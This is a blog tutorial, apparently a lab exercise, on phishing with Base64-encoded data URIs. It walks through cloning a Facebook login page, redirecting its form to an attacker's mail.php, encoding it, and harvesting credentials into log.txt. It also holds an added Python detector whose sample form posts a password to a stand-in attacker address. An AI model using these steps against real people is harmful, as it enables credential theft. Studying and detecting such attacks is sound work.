Monday, April 2, 2018

Phishing (II) - Data URIs scheme with Base64 encoding


- Layout for this exercise:

- This exercise is based on the previous one:

- The goal of this exercise is to launch a page-less phishing attack, meaning that there is no need to host an HTML file on a server.

- The phishing bait will be embedded in a URI, using the Data URIs scheme.

1 - Redirecting user input to the attacker machine

- On the attacker machine (Windows 10), let's open the index.html file inside xampp > htdocs using Notepad:

- Find action= and replace the line with the string shown below, where the address is the Windows 10 attacker's IP:

- In this way, any user input entered on the fake web page is redirected to the file mail.php, where the credentials are harvested.

2 - Encoding index.html with Base64

- Base64 is a group of similar binary-to-text encoding schemes that represent binary data as an ASCII string by translating it into a radix-64 representation.

- Each Base64 digit represents exactly 6 bits of data, so three bytes (24 bits) can be represented by four six-bit Base64 digits:

- Now, using the Base64 encoding scheme, let's encode the whole index.html page, for instance with the tool offered by this website:

- These encoded characters must be copied and stored for further use.

- Finally, before launching the attack, let's remove index.html from xampp > htdocs, since this is a page-less phishing attack:

3 - Data URIs scheme

- The data URI scheme is a Uniform Resource Identifier (URI) scheme that provides a way to include data inline in web pages as if it were an external resource:

- This technique allows normally separate elements such as images and style sheets to be fetched in a single Hypertext Transfer Protocol (HTTP) request, which may be more efficient than multiple HTTP requests.

- In other words, small files can be embedded inline into documents.

- The syntax of the data URI scheme using Base64 is composed of four parts:

data: <mediatype> ; <base64> , <data>

- In our case let's prepend data:text/html;base64, to the encoded index.html:


1) data: <- prefix for the scheme
2) text/html <- MIME data type
3) ;base64 <- indicates that Base64 encoding is in use
4) ,PCFET0.... <- index.html encoded with Base64
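As an added example that is not part of the original post, here is a defender-side Python check that parses the four-part data: URI syntax above, decodes the Base64 payload and flags HTML whose login form posts a password field to a remote host (the action= redirection set up in step 1). The sample form and the 192.0.2.10 address are constructed for the example, not taken from the post.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# data:<mediatype>[;param...][;base64],<data> -- the four parts listed above
DATA_URI_RE = re.compile(r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<payload>.*)$", re.DOTALL)

class FormScanner(HTMLParser):
    """Collect <form action> targets and note any password input in decoded HTML."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password = True

def decode_data_uri(uri):
    """Return (mediatype, decoded bytes) for a data: URI, or None if it is not one."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        return None
    mime = (m.group("mime") or "text/plain").lower()  # RFC 2397 default when omitted
    payload = m.group("payload")
    if ";base64" in m.group("params").lower():
        # tolerate padding lost in copy-paste; b64decode ignores embedded whitespace
        return mime, base64.b64decode(payload + "=" * (-len(payload) % 4))
    return mime, unquote(payload).encode()

def assess(uri):
    """Flag an HTML data: URI whose form posts a password field to a remote host."""
    decoded = decode_data_uri(uri)
    if decoded is None or decoded[0] != "text/html":
        return {"suspicious": False, "password_field": False, "remote_targets": []}
    scanner = FormScanner()
    scanner.feed(decoded[1].decode("utf-8", "replace"))
    remote = [a for a in scanner.actions if urlsplit(a).netloc]  # absolute URLs only
    return {"suspicious": scanner.has_password and bool(remote),
            "password_field": scanner.has_password, "remote_targets": remote}

# Constructed sample (not the post's Facebook clone): a login form posting to a
# documentation-range address (192.0.2.10) standing in for the attacker's IP.
SAMPLE_HTML = ('<html><body><form action="http://192.0.2.10/mail.php" method="post">'
               '<input name="email"><input type="password" name="pass"></form></body></html>')
SAMPLE_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML.encode()).decode()
```

Run assess() over URLs pulled from mail gateway or proxy logs; a text/html data URI with a password field posting to an absolute URL is the pattern this post's attack produces.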

4 - Launching the attack

- Now, when the victim enters the data URI into the browser (it could be delivered by spam email or social engineering), a fake Facebook home page is presented.

- Entering credentials:

- Immediately, a log.txt file is created on the attacker side, where the email and password are harvested: